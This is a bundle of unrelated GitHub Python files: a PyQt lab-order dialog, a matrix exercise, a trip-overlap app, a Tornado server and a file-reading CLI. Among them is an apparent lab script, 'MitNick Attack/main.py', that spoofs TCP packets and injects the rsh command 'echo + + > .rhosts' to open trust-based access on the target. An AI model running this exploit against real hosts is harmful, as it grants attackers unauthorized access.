self.tblOrderResponse.loadPreferences(getPref(preferences, 'tblOrderResponse', {}))\n return CDialogBase.loadPreferences(self, preferences)\n\n def savePreferences(self):\n result = CDialogBase.savePreferences(self)\n setPref(result, 'tblOrder', self.tblOrder.savePreferences())\n setPref(result, 'tblOrderResponse', self.tblOrderResponse.savePreferences())\n return result\n\n @QtCore.pyqtSlot()\n def onOrderPopupMenuAboutToShow(self):\n row = self.tblOrder.currentIndex().row()\n record = self.tblOrder.model().getRecordByRow(row)\n status = forceRef(record.value('status'))\n self.actResendOrder.setVisible(status in (OrderStatus.Outdated,\n OrderStatus.HasError))\n\n @QtCore.pyqtSlot()\n def onOrderResponsePopupMenuAboutToShow(self):\n row = self.tblOrderResponse.currentIndex().row()\n record = self.tblOrderResponse.model().getRecordByRow(row)\n status = forceRef(record.value('status'))\n self.actResendOrderResponse.setVisible(status in (OrderResponseStatus.Outdated,\n OrderResponseStatus.HasError))\n\n @QtCore.pyqtSlot()\n def on_actOpenOrderEvent_triggered(self):\n row = self.tblOrder.currentIndex().row()\n record = self.tblOrder.model().getRecordByRow(row)\n evenId = forceRef(record.value('event_id'))\n editEvent(self, evenId)\n\n @QtCore.pyqtSlot()\n def on_actOpenOrderResponseEvent_triggered(self):\n row = self.tblOrderResponse.currentIndex().row()\n record = self.tblOrderResponse.model().getRecordByRow(row)\n eventId = forceRef(record.value('event_id'))\n editEvent(self, eventId)\n\n @QtCore.pyqtSlot()\n def on_actResendOrder_triggered(self):\n idList = self.tblOrder.model().idList()\n orderIdList = [idList[index.row()] for index in self.tblOrder.selectionModel().selectedRows() if index.isValid()]\n\n db = QtGui.qApp.db\n tableOrder = db.table('{0}.N3LabOrderLog'.format(getLoggerDbName()))\n cond = [\n tableOrder['id'].inlist(orderIdList),\n tableOrder['status'].inlist([OrderStatus.Outdated,\n OrderStatus.HasError])\n ]\n expr = [\n tableOrder['status'].eq(OrderStatus.NotSent)\n ]\n db.updateRecords(tableOrder, expr, cond)\n self.tblOrder.model().recordCache().invalidate(orderIdList)\n\n @QtCore.pyqtSlot()\n def on_actResendOrderResponse_triggered(self):\n idList = self.tblOrderResponse.model().idList()\n orderResponseIdList = [idList[index.row()] for index in self.tblOrderResponse.selectionModel().selectedRows() if index.isValid()]\n\n db = QtGui.qApp.db\n tableOrderResponse = db.table('{0}.N3LabOrderResponseLog'.format(getLoggerDbName()))\n cond = [\n 
tableOrderResponse['id'].inlist(orderResponseIdList),\n tableOrderResponse['status'].inlist([OrderResponseStatus.Outdated,\n OrderResponseStatus.HasError])\n ]\n expr = [\n tableOrderResponse['status'].eq(OrderResponseStatus.NotSent)\n ]\n db.updateRecords(tableOrderResponse, expr, cond)\n self.tblOrder.model().recordCache().invalidate(orderResponseIdList)\n\n @QtCore.pyqtSlot()\n def on_btnOrderApply_clicked(self):\n self.reloadOrderList()\n\n @QtCore.pyqtSlot()\n def on_btnOrderResponseApply_clicked(self):\n self.reloadOrderResponseList()\n\n def reloadOrderList(self, order=None, reverse=False):\n status = self.cmbOrderStatus.value()\n syncStatus = self.cmbOrderSyncStatus.value()\n hasError = self.chkOrderError.isChecked()\n errorText = forceString(self.edtOrderError.text())\n dateFrom = self.edtOrderDateFrom.date() if self.chkOrderDateFrom.isChecked() else None\n dateTo = self.edtOrderDateTo.date() if self.chkOrderDateTo.isChecked() else None\n\n db = QtGui.qApp.db\n tableOrder = db.table('{0}.N3LabOrderLog'.format(getLoggerDbName()))\n tableOrderSync = db.table('{0}.N3LabOrderSyncLog'.format(getLoggerDbName()))\n tableOrderCurrent = tableOrderSync.alias('OrderCurrent')\n\n table = tableOrder\n\n cond = []\n if status is not None:\n cond.append(tableOrder['status'].eq(status))\n\n if (syncStatus is not None or hasError):\n table = table.leftJoin(tableOrderCurrent,\n tableOrderCurrent['id'].eqStmt(\n db.selectMax(tableOrderSync,\n tableOrderSync['id'],\n tableOrderSync['order_id'].eq(tableOrder['id']))\n ))\n\n if syncStatus is not None:\n cond.append(tableOrderCurrent['status'].eq(syncStatus))\n\n if errorText:\n cond.append(tableOrderCurrent['error'].like(u'%{0}%'.format(errorText)))\n elif hasError:\n cond.append(tableOrderCurrent['error'].ne(''))\n\n if dateFrom:\n cond.append(tableOrder['datetime'].dateGe(dateFrom))\n\n if dateTo:\n cond.append(tableOrder['datetime'].dateLe(dateTo))\n\n if order is None:\n order = [\n tableOrder['id'].desc()\n ]\n idList = db.getDistinctIdList(table, tableOrder['id'], cond, order=order)\n if reverse:\n idList = idList[::-1]\n self.tblOrder.model().setIdList(idList)\n self.lblOrderCount.setText(u'Записей в таблице: {0}'.format(len(idList)))\n\n def reloadOrderResponseList(self, order=None, reverse=False):\n status = self.cmbOrderResponseStatus.value()\n syncStatus = self.cmbOrderResponseSyncStatus.value()\n hasError = self.chkOrderResponseError.isChecked()\n errorText = forceString(self.edtOrderResponseError.text())\n\n db = QtGui.qApp.db\n tableOrderResponse = db.table('{0}.N3LabOrderResponseLog'.format(getLoggerDbName()))\n tableOrderResponseSync = db.table('{0}.N3LabOrderResponseSyncLog'.format(getLoggerDbName()))\n tableOrderResponseCurrent = tableOrderResponseSync.alias('OrderResponseCurrent')\n\n table = tableOrderResponse\n\n cond = []\n if status is not None:\n cond.append(tableOrderResponse['status'].eq(status))\n\n if (syncStatus is not None or hasError):\n table = table.leftJoin(tableOrderResponseCurrent,\n tableOrderResponseCurrent['id'].eqStmt(\n db.selectMax(tableOrderResponseSync,\n tableOrderResponseSync['id'],\n tableOrderResponseSync['orderResponse_id'].eq(tableOrderResponse['id']))\n ))\n\n if syncStatus is not None:\n cond.append(tableOrderResponseCurrent['status'].eq(syncStatus))\n\n if errorText:\n cond.append(tableOrderResponseCurrent['error'].like(u'%{0}%'.format(errorText)))\n elif hasError:\n cond.append(tableOrderResponseCurrent['error'].ne(''))\n\n if self.chkOrderResponseDate.isChecked():\n date = 
self.edtOrderResponseDate.date()\n cond.append(tableOrderResponse['datetime'].dateEq(date))\n\n if order is None:\n order = [\n tableOrderResponse['id'].desc()\n ]\n idList = db.getDistinctIdList(table, tableOrderResponse['id'], cond, order=order)\n if reverse:\n idList = idList[::-1]\n self.tblOrderResponse.model().setIdList(idList)\n self.lblOrderResponseCount.setText(u'Записей в таблице: {0}'.format(len(idList)))\n\n def setOrderIdList(self, idList):\n self.tblOrder.model().setIdList(idList)\n self.lblOrderCount.setText(u'Записей в таблице: {0}'.format(len(idList)))\n\n def setOrderResponseIdList(self, idList):\n self.tblOrderResponse.model().setIdList(idList)\n self.lblOrderResponseCount.setText(u'Записей в таблице: {0}'.format(len(idList)))\n\n\n# def main():\n# import sys\n# from library.database import connectDataBaseByInfo\n# from s11main import CS11mainApp\n#\n# app = CS11mainApp(sys.argv, False, 'S11App.ini', False)\n# app.applyDecorPreferences()\n#\n# QtCore.QTextCodec.setCodecForTr(QtCore.QTextCodec.codecForName(u'utf8'))\n# db = connectDataBaseByInfo({'driverName' : 'mysql',\n# 'host' : 'p104',\n# 'port' : 3306,\n# 'database' : 's11',\n# 'user' : 'dbuser',\n# 'password' : 'dbpassword',\n# 'connectionName' : 'vista-med',\n# 'compressData' : True,\n# 'afterConnectFunc': None})\n# QtGui.qApp = app\n# QtGui.qApp.db = db\n# orgId = (db.getDistinctIdList('OrgStructure', 'organisation_id', 'deleted=0') or [None])[0]\n# QtGui.qApp.currentOrgId = lambda: orgId\n# QtGui.qApp.currentOrgStructureId = lambda: None\n# dlg = CLabOrderListDialog(None)\n# dlg.exec_()\n#\n#\n# if __name__ == '__main__':\n# main()\n","repo_name":"dio4/vista_1","sub_path":"Exchange/n3labdata/OrderListDialog.py","file_name":"OrderListDialog.py","file_ext":"py","file_size_in_byte":24521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"73620052728","text":"#Янова Даниэлла ИУ7-13\n#Найти средние арифметические элементов массива в каждой строке и наибольшее\n#из них\ntry:\n s=int(input('Введите количество строк в матрице: '))\n c=int(input('Введите количество столбцов в матрице: '))\n print('Введите матрицу')\n R=[0]*s\n for i in range(s):\n R[i]=[0]*c\n for i in range (s):\n n=i+1\n print('Введите',n,'-ю строку матрицы:',end=' ')\n R[i]=list(map(float,input().split()))\n print('Исходная матрица: ')\n for i in range(s):\n for j in range(c):\n if R[i][j]<=-10e+4 or R[i][j]>=10e+3:\n print('{:7.1e}'.format(R[i][j]),end=' ')\n else:\n print('{:7.1f}'.format(R[i][j]),end=' ')\n print()\n sr=0\n k=0\n for i in range(s):\n for j in range(c):\n sr+=R[i][j]\n k+=1\n R[i][0]=sr/k\n n=i+1\n print('Среднее арифметическое ',n,'-й строки =',end=' ')\n if R[i][0]<=-10e+4 or R[i][0]>=10e+3:\n print('{:7.1e}'.format(R[i][0]))\n else:\n print('{:7.1f}'.format(R[i][0]))\n sr=0\n k=0\n Max=R[0][0]\n for i in range(1,s):\n if R[i][0]>Max:\n Max=R[i][0]\n print()\n print('Наибольшее среднее арифметическое= ',end='')\n if Max<=-10e+4 or Max>=10e+3:\n print('{:7.1e}'.format(Max),end=' ')\n else:\n print('{:7.1f}'.format(Max),end=' ')\nexcept ValueError:\n print('Введены неверные значения')\n","repo_name":"YumiSikei/Flashbacks_1-5_sem","sub_path":"1 sem/Python/YaD_sr_matrix.py","file_name":"YaD_sr_matrix.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15795759986","text":"# Dylan Marn\n\n'''\nLinkUp: An app designed to help far away friends...\n allow users to link up 
whenever possible and make the most of their time,\n by making the plans easy so they can make the memories\n\n2 users input their trip details and the program alerts the users if there is any overlap time where they could possible LinkUp\n\nTaget audience:\n college students who moved away from friends for school - easily lets friend group know who is back home to LinkUp\n friends that want help connecting whenever possible\n friends that want an easy way to plan events (with app full functionality)\n \nFurther development:\n add capacity for 2+ users\n add a \"home\" location where another user's trip to that location will yield a LinkUp\n add support for world-wide locations, possibly as specific as cities\n add feature that matched users traveling to neighboring cities not just exact locations\n add a \"things to do\" section that helps connected users find things to do in the area\n'''\n\nimport re\nfrom datetime import date\n\n# class Trip stores important trip data\nclass Trip:\n def __init__(self, name, home, location=None, startdate=None, enddate=None):\n self.name = name\n self.home = home\n self.location = location\n self.startdate = startdate\n self.enddate = enddate\n \n def __str__(self):\n if self.location:\n return f\"{self.name} is from {self.home} and traveling to {self.location} from {self.startdate} to {self.enddate}\"\n else:\n return f\"{self.name} is from {self.home} with no current travel plans\"\n\n\ndef main():\n print(\"Please fill out the following for user #1\")\n user1 = set_user() # get user #1 trip details\n print(f\"\\nPlease fill out the following for user #2\")\n user2 = set_user() # get user #2 trip details\n print(f\"///////////////////////////////////////////////////////////////////////////////\")\n print(user1)\n print(user2)\n print(f\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\n linkUp(user1, user2)\n print(f\"///////////////////////////////////////////////////////////////////////////////\")\n\n## create functions to get user input(name, location and dates) for 2+ users\ndef set_user():\n # get name\n name = None # initalize name to nothing\n while not name: # loop until valid name\n name = get_name(input(\"What is your name? \"))\n if name: # if valid name, confirm with user\n name = is_correct(f\"Hello {name}, is this how you would like to be addressed? (Y/N) \", name)\n\n # get home location\n home = None\n while not home: # loop until valid state\n home = get_location(input(\"Where are you currently? \")) \n if home: # if valid state, confirm with user\n home = is_correct(f\"{name}, it appears you are currenly in {home}, is this correct? (Y/N) \", home)\n\n # determine if user has an upcoming trip\n \n while True:\n trip = input(\"Do you have an upcoming trip? (Y/N) \").upper()\n if trip == \"N\":\n return Trip(name, home)\n elif trip == \"Y\":\n # get trip location\n location = None # initalize state to nothing\n while not location: # loop until valid state\n location = get_location(input(\"Where are you traveling to? \"))\n if location: # if valid state, confirm with user\n if location == home: # trip can not be to current location\n print(\"You are already there\")\n location = None\n else: # check if correct response\n location = is_correct(f\"{name}, it appears you are traveling to {location}, is this correct? 
(Y/N) \", location)\n\n # get trip start date\n s_date = None # initalize start date to nothing\n while not s_date: # loop until valid start date\n s_date = get_date(input(\"Start date: \"))\n if s_date: # if valid start date, confirm with user\n s_date = is_correct(f\"The start of your trip is {s_date.strftime('%A %B %d, %Y')}, is this correct? (Y/N) \", s_date)\n\n # get trip end date\n e_date = None # initalize end date to nothing\n while not e_date: # loop until valid end date\n e_date = get_date(input(\"End date: \"))\n if e_date:\n if (e_date - s_date).days >= 0:\n e_date = is_correct(f\"The end of your trip is {e_date.strftime('%A %B %d, %Y')}, is this correct? (Y/N) \", e_date)\n else:\n e_date = None\n print(\"Error: End date can not be before start date\")\n\n return Trip(name, home, location, s_date, e_date)\n\n else:\n print(\"Invalid response\")\n\n\n## create a function to get user name\ndef get_name(name):\n name = name.strip().title()\n return name \n\n\n## create a function to get user location\ndef get_location(location):\n location = location.strip().title() # clean up user input\n # dictionary of US states and abbreviation as potential location names\n # for further development, additional locations should be added\n states = {\n 'AK': 'Alaska',\n 'AL': 'Alabama',\n 'AR': 'Arkansas',\n 'AZ': 'Arizona',\n 'CA': 'California',\n 'CO': 'Colorado',\n 'CT': 'Connecticut',\n 'DC': 'District of Columbia',\n 'DE': 'Delaware',\n 'FL': 'Florida',\n 'GA': 'Georgia',\n 'HI': 'Hawaii',\n 'IA': 'Iowa',\n 'ID': 'Idaho',\n 'IL': 'Illinois',\n 'IN': 'Indiana',\n 'KS': 'Kansas',\n 'KY': 'Kentucky',\n 'LA': 'Louisiana',\n 'MA': 'Massachusetts',\n 'MD': 'Maryland',\n 'ME': 'Maine',\n 'MI': 'Michigan',\n 'MN': 'Minnesota',\n 'MO': 'Missouri',\n 'MS': 'Mississippi',\n 'MT': 'Montana',\n 'NC': 'North Carolina',\n 'ND': 'North Dakota',\n 'NE': 'Nebraska',\n 'NH': 'New Hampshire',\n 'NJ': 'New Jersey',\n 'NM': 'New Mexico',\n 'NV': 'Nevada',\n 'NY': 'New York',\n 'OH': 'Ohio',\n 'OK': 'Oklahoma',\n 'OR': 'Oregon',\n 'PA': 'Pennsylvania',\n 'RI': 'Rhode Island',\n 'SC': 'South Carolina',\n 'SD': 'South Dakota',\n 'TN': 'Tennessee',\n 'TX': 'Texas',\n 'UT': 'Utah',\n 'VA': 'Virginia',\n 'VT': 'Vermont',\n 'WA': 'Washington',\n 'WI': 'Wisconsin',\n 'WV': 'West Virginia',\n 'WY': 'Wyoming'\n }\n\n # list of keys and values to compare user input with\n keysList = list(states.keys())\n for i in range(len(keysList)): # title case keys to match title cased input\n keysList[i] = keysList[i].title()\n valuesList = list(states.values())\n\n if location in keysList:\n return states[location.upper()] # return full state name if given abbreviated version (must use upper to index into dict)\n elif location in valuesList:\n return location # return user input if valid\n else:\n print(\"Invalid location\")\n print(\"Currently only U.S. 
states supported\")\n return None\n\n\n## create a function to get user date, returned in standard form\ndef get_date(givendate):\n # create a dict of months and corresponding number\n months = {\n \"January\": 1,\n \"February\": 2,\n \"March\": 3,\n \"April\": 4,\n \"May\": 5,\n \"June\": 6,\n \"July\": 7,\n \"August\": 8,\n \"September\": 9,\n \"October\": 10,\n \"November\": 11,\n \"December\": 12\n }\n # test for date in MonthName DD, YYYY format\n matches1 = re.search(r\"^(.+) (\\d{1,2})[,| ] ?(\\d{1,4})$\", givendate, re.IGNORECASE)\n if matches1:\n try: # match input month to corresponding number\n month = int(months[(matches1.group(1)).title()])\n except: # if invalid month surpress error\n print(\"Invalid month name\")\n return None\n day = int(matches1.group(2))\n year = int(matches1.group(3))\n try:\n date(year, month, day)\n return date(year, month, day)\n except:\n pass\n\n # test for date in common MM/DD/YYYY or MM-DD-YYYY format\n matches2 = re.search(r\"^(\\d{1,2})[/-](\\d{1,2})[/-](\\d{1,4})$\", givendate, re.IGNORECASE)\n if matches2:\n month = int(matches2.group(1))\n day = int(matches2.group(2))\n year = int(matches2.group(3))\n\n # alternative shorter method, less descriptive error feedback\n # try:\n # date(year, month, day)\n # return date(year, month, day)\n\n try: # test input for calendar date bounds\n if 1 <= month <= 12 and 1 <= day <= 31: # narrow bounds, only 12 months with max 31 days\n if month in [4,6,9,11] and day == 31: # months with only 30 days\n print(\"Invalid days for given month\")\n return None\n elif month == 2: # February\n if year%4 == 0: # leap year\n if year%100 == 0: # not leap year\n if year%400 == 0: # leap year\n if day > 29:\n print(\"Invalid days for given month\")\n return None\n else:\n return date(year, month, day)\n if day > 28:\n print(\"Invalid days for given month\")\n return None\n else:\n return date(year, month, day)\n if day > 29:\n print(\"Invalid days for given month\")\n return None\n else:\n return date(year, month, day)\n if day > 28:\n print(\"Invalid days for given month\")\n return None\n else:\n return date(year, month, day)\n else: # if input satisfies all bounds\n return date(year, month, day)\n except:\n pass\n\n # if none of the above can be completed, provide user a hint\n print(\"Invalid date - Valid forms of date include\")\n print(\"1 MM/DD/YYYY\")\n print(\"2 MM-DD-YYYY\")\n print(\"3 Month DD, YYYY\")\n\n\n## create a funtion to determine if two users have overlapping dates in the same location\ndef linkUp(user1, user2):\n if not user1.location and not user2.location: # if neither users have a trip\n if user1.home == user2.home: # only linkUp if homes are the same\n print(f\"{user1.name} and {user2.name} will both be in {user1.home} indefinetly\")\n else: # else there is no overlap\n print(f\"There is no overlapping period within {user1.name}'s and {user2.name}'s locations\")\n\n elif not user1.location and user2.location: # if only user2 has a trip\n if user1.home == user2.home: # if homes are the same, linkUp until user2 leaves\n print(f\"{user1.name} and {user2.name} will both be in {user1.home} until {user2.startdate}\")\n print(f\"They will both be back in {user1.home} from {user2.enddate} indefinetly\")\n elif user1.home == user2.location: # if user2's trip is to user1's home, linkUp for duration of user2's trip\n print(f\"{user1.name} and {user2.name} will both be in {user1.home} from {user2.startdate} to {user2.enddate}\")\n else: # else there is no overlap\n print(f\"There is no overlapping period 
within {user1.name}'s and {user2.name}'s locations\")\n\n elif user1.location and not user2.location: # if only user1 has a trip\n if user1.home == user2.home: # if homes are the same, linkUp until user1 leaves\n print(f\"{user1.name} and {user2.name} will both be in {user1.home} until {user1.startdate}\")\n print(f\"They will both be back in {user1.home} from {user1.enddate} indefinetly\")\n elif user2.home == user1.location: # if user1's trip is to user2's home, linkUp for duration of user1's trip\n print(f\"{user1.name} and {user2.name} will both be in {user1.home} from {user1.startdate} to {user1.enddate}\")\n else: # else there is no overlap\n print(f\"There is no overlapping period within {user1.name}'s and {user2.name}'s locations\")\n\n elif user1.location and user2.location: # if both users have a trip\n earliest_start = min(user1.startdate, user2.startdate)\n latest_start = max(user1.startdate, user2.startdate) \n earliest_end = min(user1.enddate, user2.enddate) \n latest_end = max(user1.enddate, user2.enddate) \n if user1.home == user2.home and user1.location != user2.location: # if home location is the same but not trip location, linkUp until first user to leave \n if latest_start < earliest_end:\n print(f\"{user1.name} and {user2.name} will both be in {user1.home} until {earliest_start}\")\n print(f\"They will both be back in {user1.home} from {latest_end} indefinetly\")\n elif latest_start > earliest_end:\n print(f\"{user1.name} and {user2.name} will both be in {user1.home} until {earliest_start}\")\n print(f\"They will both be back in {user1.home} from {earliest_end} to {latest_start}\")\n print(f\"They will both be back in {user1.home} from {latest_end} indefinetly\")\n else:\n print(f\"{user1.name} and {user2.name} will both be in {user1.home} until {earliest_start}\")\n print(f\"They just missed each other on {latest_start}\")\n print(f\"They will both be back in {user1.home} from {latest_end} indefinetly\")\n\n elif user1.home == user2.home and user1.location == user2.location: # if home location and trip location is the same\n print(f\"{user1.name} and {user2.name} will both be in {user1.home} until {earliest_start}\")\n if latest_start < earliest_end:\n print(f\"They will both be in {user1.location} from {latest_start} to {earliest_end}\")\n elif latest_start > earliest_end:\n print(f\"They will both be back in {user1.home} from {earliest_end} to {latest_start}\")\n else:\n print(f\"They just misses each other on {latest_start}\")\n print(f\"and finally will both be in {user1.home} from {earliest_start} indefinetly\")\n\n elif user1.home == user2.location and user2.home == user1.location: # if user1's trip is to user2's home and if user2's trip is to user1's home\n if user1.enddate < user2.startdate:\n print(f\"{user1.name} and {user2.name} will both be in {user1.location} from {earliest_start} to {earliest_end}\")\n print(f\"They will both be in {user2.location} from {latest_start} to {latest_end}\")\n elif user2.enddate < user1.startdate:\n print(f\"{user1.name} and {user2.name} will both be in {user2.location} from {earliest_start} to {earliest_end}\")\n print(f\"They will both be in {user1.location} from {latest_start} to {latest_end}\")\n\n if user1.startdate > user2.startdate and user1.startdate < user2.enddate:\n print(f\"{user1.name} and {user2.name} will both be in {user1.home} from {earliest_start} to {latest_start}\")\n elif user2.startdate > user1.startdate and user2.startdate < user1.enddate:\n print(f\"{user1.name} and {user2.name} will both be in 
{user2.home} from {earliest_start} to {latest_start}\")\n elif user1.startdate == user2.startdate:\n print(f\"They just misses each other on {earliest_start}\")\n \n if user1.enddate < user2.enddate and user1.enddate > user2.startdate:\n print(f\"They will both be in {user1.home} from {earliest_end} to {latest_end}\")\n elif user2.enddate < user1.enddate and user2.enddate > user1.startdate:\n print(f\"They will both be in {user1.location} from {earliest_end} to {latest_end}\") \n elif user1.enddate == user2.enddate:\n print(f\"They just misses each other on {latest_end}\") \n \n elif user1.home != user2.home and user1.location == user2.location: # if trip location is the same but not home\n if latest_start < earliest_end:\n print(f\"{user1.name} and {user2.name} will both be in {user1.location} from {latest_start} to {earliest_end}\")\n elif latest_start > earliest_end:\n print(f\"There is no overlapping time within {user1.name}'s and {user2.name}'s locations\")\n else:\n print(f\"They just misses each other on {latest_start}\")\n\n else: # if home location and trip location is not the same\n print(f\"There is no overlapping time within {user1.name}'s and {user2.name}'s locations\")\n \ndef is_correct(question, var):\n while True: # loop until user confirms or denies\n response = input(question).upper()\n if response == \"Y\": # if confirmed, continue\n return var\n elif response == \"N\": # if denied, reset end date\n return None\n else:\n print(\"Invalid response\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"DylanMarn/LinkUp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8827936438","text":"#!usr/bin/python3\nfrom scapy.all import *\nimport sys\nX_IP_Address = \"10.9.0.3\"\nX_Tml_PortNo = 512\nX_Tml_PortNo_2 = 1021\nTrusted_IP_Address = \"10.9.0.4\"\nTrusted_PortNo = 1021\nTrusted_PortNo_2 = 9088\n\ndef spoof_pkt(pkt):\n\tsequence_no = 647862699 + 1\n\tprevious_ip = pkt[IP]\n\tprevious_tcp = pkt[TCP]\n\ttcp_length = previous_ip.len - previous_ip.ihl*4 - previous_tcp.dataofs*4\n\tprint(\"{}:{} -> {}:{} Flags={} Len={}\".format(previous_ip.src, previous_tcp.sport,\n\t\tprevious_ip.dst, previous_tcp.dport, previous_tcp.flags, tcp_length))\n\n\tif previous_tcp.flags == \"SA\":\n\t\tprint(\"Sending Spoofed ACK Packet ...\")\n\t\tIPLayer = IP(src=Trusted_IP_Address, dst=X_IP_Address)\n\t\tTCPLayer = TCP(sport=Trusted_PortNo,dport=X_Tml_PortNo,flags=\"A\",\n\t\t seq=sequence_no, ack= previous_ip.seq + 1)\n\t\tpkt = IPLayer/TCPLayer\n\t\tsend(pkt,verbose=0)\n\t\t# After sending ACK packet\n\t\tprint(\"Sending Spoofed RSH Data Packet ...\")\n\t\tdata = '9088\\x00seed\\x00seed\\x00echo + + > .rhosts\\x00'\n\t\tpkt = IPLayer/TCPLayer/data\n\t\tsend(pkt,verbose=0)\n\n\tif previous_tcp.flags == 'S' and previous_tcp.dport == Trusted_PortNo_2 and previous_ip.dst == Trusted_IP_Address:\n\t\tsequence_num = 110086204\n\t\tprint(\"Sending Spoofed SYN+ACK Packet for 2nd Connection...\")\n\t\tIPLayer = IP(src=Trusted_IP_Address, dst=X_IP_Address)\n\t\tTCPLayer = TCP(sport=Trusted_PortNo_2,dport=X_Tml_PortNo_2,flags=\"SA\",\n\t\t seq=sequence_num, ack= previous_ip.seq + 1)\n\t\tpkt = IPLayer/TCPLayer\n\t\tsend(pkt,verbose=0)\n\ndef spoofing_SYN():\n\tprint(\"Sending Spoofed SYN Packet ...\")\n\tIPLayer = IP(src=\"10.9.0.4\", dst=\"10.9.0.3\")\n\tTCPLayer = TCP(sport=1021,dport=512,flags=\"S\", seq=647862699)\n\tpkt = 
IPLayer/TCPLayer\n\tsend(pkt,verbose=0)\n\ndef main():\n\tspoofing_SYN()\n\tpkt = sniff(filter=\"tcp and src host 10.9.0.3\", prn=spoof_pkt)\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"Deepak1297/TopGun_NDS","sub_path":"MitNick Attack/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15675508982","text":"#coding=utf-8\n#main.py\nimport tornado.autoreload\nimport tornado.httpserver\nimport tornado.options\nimport tornado.ioloop\nimport tornado.web\nimport os.path\nimport config\n\nfrom controller import servers, app, business, idc, isp, user\n\nfrom tornado.options import define, options\ndefine(\"p\", default=8000, type=int)\n\n\nclass Application(tornado.web.Application):\n def __init__(self):\n handlers = [\n (r\"/\", servers.IndexHandler),\n (r\"/server/(\\d+)/\", servers.AddHandler),\n (r\"/server/add/\", servers.AddHandler),\n (r\"/server/remove/\", servers.RemoveHandler),\n (r\"/login/\", user.LoginHandler),\n (r\"/logout/\", user.LogoutHandler),\n (r\"/business/\", business.IndexHandler),\n (r\"/business/add/\", business.AddHandler),\n (r\"/business/remove/\", business.RemoveHandler),\n (r\"/app/\", app.IndexHandler),\n (r\"/app/add/\", app.AddHandler),\n (r\"/app/remove/\", app.RemoveHandler),\n (r\"/idc/\", idc.IndexHandler),\n (r\"/idc/add/\", idc.AddHandler),\n (r\"/idc/remove/\", idc.RemoveHandler),\n (r\"/isp/\", isp.IndexHandler),\n (r\"/isp/add/\", isp.AddHandler),\n (r\"/isp/remove/\", isp.RemoveHandler),\n (r\"/user/\", user.IndexHandler),\n (r\"/user/add/\", user.AddHandler),\n (r\"/user/remove/\", user.RemoveHandler),\n (r\"/user/resetpasswd/\", user.ResetpasswdHandler),\n ]\n self.config = config\n settings = {\n \"static_path\": os.path.join(os.path.dirname(__file__), \"static\"),\n \"template_path\": os.path.join(os.path.dirname(__file__), \"templates\"),\n \"cookie_secret\": \"61oETzKXQAKaYdkL5gEmHeJJFaYh7Ecnp2XdiP1o/Vo=\",\n \"login_url\": \"/login/\",\n }\n tornado.web.Application.__init__(self, handlers, debug=False, **settings)\n\n\nif __name__ == '__main__':\n tornado.options.parse_command_line()\n http_server = tornado.httpserver.HTTPServer(Application())\n http_server.listen(options.p)\n tornado.ioloop.IOLoop.instance().start()\n\n","repo_name":"editpne/server_manage","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31666751979","text":"from __future__ import annotations\r\n\r\nimport os\r\nimport ast\r\nimport sys\r\nimport argparse\r\nfrom srutil import util\r\nfrom typing import Any\r\n\r\nfrom . import File, __version__, __package__\r\n\r\n\r\ndef _epilog() -> str:\r\n return \"\"\"-w/--write function may return error as it expects data in specific datatype. 
\r\n Writing files using commandline isn't recommended.\"\"\"\r\n\r\n\r\ndef get_argument() -> argparse.Namespace:\r\n parser = argparse.ArgumentParser(prog=__package__, usage=util.stringbuilder(__package__, \" [options]\"),\r\n epilog=_epilog())\r\n parser.add_argument('-v', '--version', action='version', help='show version number and exit.', version=__version__)\r\n group = parser.add_argument_group(\"to read/write files\")\r\n group.add_argument(\"path\", type=str, help=\"path to read/write\")\r\n group.add_argument(\"-r\", \"--read\", dest=\"read\", default=False, action=\"store_true\", help=\"to read file\")\r\n group.add_argument(\"-w\", \"--write\", dest=\"write\", default=False, action=\"store_true\", help=\"to write file\")\r\n group.add_argument(\"-d\", \"--data\", metavar='', help=\"data to write\")\r\n group.add_argument(\"-f\", \"--format\", dest='format', metavar='', choices=['csv', 'json', 'parquet', 'text', 'toml'],\r\n type=str, required=False, help=\"file format to use\")\r\n group.add_argument(\"-m\", \"--mode\", dest=\"mode\", metavar='', default=None, help=\"mode to open file\")\r\n group.add_argument(\"--rfv\", dest=\"rfv\", default=False, action=\"store_true\",\r\n help=\"will return formatted string (CSV only)\")\r\n parser.add_argument_group(group)\r\n options = parser.parse_args()\r\n if not options.format:\r\n _ext = list(os.path.splitext(options.path)).pop()\r\n _format = {\".csv\": \"csv\", \".json\": \"json\", \".parquet\": \".parquet\", \".toml\": \"toml\", \".txt\": \"text\"}\r\n if _ext not in _format:\r\n parser.error(\"the following arguments are required: -f/--format\")\r\n else:\r\n options.format = _format.get(_ext)\r\n if not options.read and not options.write:\r\n parser.error(\"one of the following arguments are required: -r/--read or -w/--write\")\r\n if options.read and options.write:\r\n parser.error(\"any one of the following arguments should be given: -r/--read or -w/--write\")\r\n if options.write and not options.data:\r\n parser.error(\"the following arguments are required: -d/--data\")\r\n return options\r\n\r\n\r\ndef _get_data(_data: str, _format: str) -> Any:\r\n return _data if _format == 'text' else ast.literal_eval(_data)\r\n\r\n\r\ndef main():\r\n options = get_argument()\r\n mode = options.mode if options.mode else None\r\n if options.read:\r\n print(File.read(options.path, _format=options.format, mode=mode, _rfv=options.rfv))\r\n elif options.write:\r\n data = _get_data(options.data, options.format)\r\n print(File.write(data, options.path, _format=options.format, mode=mode))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n sys.exit(main())\r\n","repo_name":"codesrg/ioutil","sub_path":"ioutil/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7244024017","text":"import requests\nfrom 